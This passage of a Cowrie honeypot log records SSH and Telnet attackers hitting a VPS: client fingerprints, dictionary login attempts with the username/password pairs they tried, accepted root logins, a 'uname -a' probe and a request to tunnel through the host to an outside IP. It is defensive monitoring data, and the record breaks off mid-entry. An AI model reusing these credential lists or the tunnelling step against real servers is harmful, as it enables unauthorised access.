{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:59:40.249829Z","src_ip":"212.227.235.229","session":"9767bcbf0f09"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T10:59:40.383677Z","src_ip":"212.227.235.229","session":"9767bcbf0f09"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:59:40.785979Z","src_ip":"212.227.235.229","session":"9767bcbf0f09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T10:59:40.920380Z","session":"9767bcbf0f09"}
{"eventid":"cowrie.session.closed","duration":"301.8","message":"Connection lost after 301.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:59:50.305109Z","src_ip":"212.227.235.229","session":"ad853944352b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37316,"dst_ip":"1.2.3.4","dst_port":22,"session":"be5f348af0e0","protocol":"ssh","message":"New connection: 212.227.235.229:37316 (1.2.3.4:22) [session: be5f348af0e0]","sensor":"my-vps","timestamp":"2025-08-28T10:59:58.547041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:59:58.548562Z","src_ip":"212.227.235.229","session":"be5f348af0e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:59:59.499396Z","src_ip":"212.227.235.229","session":"be5f348af0e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32969,"dst_ip":"1.2.3.4","dst_port":22,"session":"22d9dd59699e","protocol":"ssh","message":"New connection: 212.227.125.160:32969 (1.2.3.4:22) [session: 22d9dd59699e]","sensor":"my-vps","timestamp":"2025-08-28T11:00:07.983889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:00:07.985190Z","src_ip":"212.227.125.160","session":"22d9dd59699e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:00:08.044632Z","src_ip":"212.227.125.160","session":"22d9dd59699e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"alex1","message":"login attempt [admin/alex1] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:08.364925Z","src_ip":"212.227.125.160","session":"22d9dd59699e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"akasha","message":"login attempt [admin/akasha] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:09.427460Z","src_ip":"212.227.125.160","session":"22d9dd59699e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"agatha","message":"login attempt [admin/agatha] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:10.489927Z","src_ip":"212.227.125.160","session":"22d9dd59699e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ace123","message":"login attempt [admin/ace123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:11.554106Z","src_ip":"212.227.125.160","session":"22d9dd59699e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abstract","message":"login attempt [admin/abstract] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:12.615528Z","src_ip":"212.227.125.160","session":"22d9dd59699e"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:00:13.676289Z","src_ip":"212.227.125.160","session":"22d9dd59699e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63703,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bc3b60d7876","protocol":"ssh","message":"New connection: 212.227.235.229:63703 (1.2.3.4:22) [session: 3bc3b60d7876]","sensor":"my-vps","timestamp":"2025-08-28T11:00:38.841062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:00:38.842276Z","src_ip":"212.227.235.229","session":"3bc3b60d7876"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:00:39.543983Z","src_ip":"212.227.235.229","session":"3bc3b60d7876"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":56528,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f41ac4a7849","protocol":"ssh","message":"New connection: 27.112.79.123:56528 (1.2.3.4:22) [session: 5f41ac4a7849]","sensor":"my-vps","timestamp":"2025-08-28T11:00:39.918469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:00:39.919787Z","src_ip":"27.112.79.123","session":"5f41ac4a7849"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:00:40.195141Z","src_ip":"27.112.79.123","session":"5f41ac4a7849"}
{"eventid":"cowrie.login.failed","username":"user","password":"amsterdam","message":"login attempt [user/amsterdam] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:40.264731Z","src_ip":"212.227.235.229","session":"3bc3b60d7876"}
{"eventid":"cowrie.login.failed","username":"misha","password":"misha","message":"login attempt [misha/misha] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:41.312948Z","src_ip":"27.112.79.123","session":"5f41ac4a7849"}
{"eventid":"cowrie.login.failed","username":"user","password":"1959","message":"login attempt [user/1959] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:41.879035Z","src_ip":"212.227.235.229","session":"3bc3b60d7876"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:00:42.586180Z","src_ip":"27.112.79.123","session":"5f41ac4a7849"}
{"eventid":"cowrie.login.failed","username":"user","password":"webmaster","message":"login attempt [user/webmaster] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:43.058703Z","src_ip":"212.227.235.229","session":"3bc3b60d7876"}
{"eventid":"cowrie.login.failed","username":"user","password":"valley","message":"login attempt [user/valley] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:44.661864Z","src_ip":"212.227.235.229","session":"3bc3b60d7876"}
{"eventid":"cowrie.login.failed","username":"user","password":"space","message":"login attempt [user/space] failed","sensor":"my-vps","timestamp":"2025-08-28T11:00:45.827587Z","src_ip":"212.227.235.229","session":"3bc3b60d7876"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:00:46.993710Z","src_ip":"212.227.235.229","session":"3bc3b60d7876"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:00:50.249308Z","src_ip":"212.227.235.229","session":"9767bcbf0f09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43668,"dst_ip":"1.2.3.4","dst_port":22,"session":"b21b757a7a36","protocol":"ssh","message":"New connection: 212.227.125.160:43668 (1.2.3.4:22) [session: b21b757a7a36]","sensor":"my-vps","timestamp":"2025-08-28T11:01:08.166388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:01:08.264516Z","src_ip":"212.227.125.160","session":"b21b757a7a36"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T11:01:08.265182Z","src_ip":"212.227.125.160","session":"b21b757a7a36"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pfsense","message":"login attempt [admin/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T11:01:08.753510Z","src_ip":"212.227.125.160","session":"b21b757a7a36"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:01:09.965116Z","src_ip":"212.227.125.160","session":"b21b757a7a36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6337,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e11ecfa0a2b","protocol":"ssh","message":"New connection: 212.227.235.229:6337 (1.2.3.4:22) [session: 4e11ecfa0a2b]","sensor":"my-vps","timestamp":"2025-08-28T11:01:43.428938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:01:43.783900Z","src_ip":"212.227.235.229","session":"4e11ecfa0a2b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T11:01:43.784805Z","src_ip":"212.227.235.229","session":"4e11ecfa0a2b"}
{"eventid":"cowrie.login.success","username":"root","password":"0R968JI9UFJ6","message":"login attempt [root/0R968JI9UFJ6] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:01:46.657089Z","src_ip":"212.227.235.229","session":"4e11ecfa0a2b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:01:48.237323Z","src_ip":"212.227.235.229","session":"4e11ecfa0a2b"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T11:01:48.238038Z","src_ip":"212.227.235.229","session":"4e11ecfa0a2b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:01:48.785607Z","src_ip":"212.227.235.229","session":"4e11ecfa0a2b"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:01:48.977677Z","src_ip":"212.227.235.229","session":"4e11ecfa0a2b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":53064,"dst_ip":"1.2.3.4","dst_port":22,"session":"03a0ca48c49e","protocol":"ssh","message":"New connection: 27.112.79.123:53064 (1.2.3.4:22) [session: 03a0ca48c49e]","sensor":"my-vps","timestamp":"2025-08-28T11:01:53.568058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:01:53.569182Z","src_ip":"27.112.79.123","session":"03a0ca48c49e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:01:53.842608Z","src_ip":"27.112.79.123","session":"03a0ca48c49e"}
{"eventid":"cowrie.login.failed","username":"vmail","password":"123456","message":"login attempt [vmail/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:01:55.000134Z","src_ip":"27.112.79.123","session":"03a0ca48c49e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:01:56.276482Z","src_ip":"27.112.79.123","session":"03a0ca48c49e"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":9285,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c2ec914b2ff","protocol":"telnet","message":"New connection: 194.165.16.161:9285 (1.2.3.4:23) [session: 1c2ec914b2ff]","sensor":"my-vps","timestamp":"2025-08-28T11:01:57.364944Z"}
{"eventid":"cowrie.session.closed","duration":0.0010030269622802734,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:01:57.365863Z","src_ip":"194.165.16.161","session":"1c2ec914b2ff"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":9387,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7024d09e9eb","protocol":"telnet","message":"New connection: 194.165.16.161:9387 (1.2.3.4:23) [session: d7024d09e9eb]","sensor":"my-vps","timestamp":"2025-08-28T11:01:57.378854Z"}
{"eventid":"cowrie.session.closed","duration":0.015218019485473633,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:01:57.394016Z","src_ip":"194.165.16.161","session":"d7024d09e9eb"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":9619,"dst_ip":"1.2.3.4","dst_port":23,"session":"377493e7c306","protocol":"telnet","message":"New connection: 194.165.16.161:9619 (1.2.3.4:23) [session: 377493e7c306]","sensor":"my-vps","timestamp":"2025-08-28T11:01:57.408399Z"}
{"eventid":"cowrie.session.closed","duration":0.015190362930297852,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:01:57.423512Z","src_ip":"194.165.16.161","session":"377493e7c306"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:01:58.550112Z","src_ip":"212.227.235.229","session":"be5f348af0e0"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":36774,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fe36c77c7d6","protocol":"ssh","message":"New connection: 27.112.79.123:36774 (1.2.3.4:22) [session: 3fe36c77c7d6]","sensor":"my-vps","timestamp":"2025-08-28T11:03:11.049217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:03:11.050598Z","src_ip":"27.112.79.123","session":"3fe36c77c7d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@ope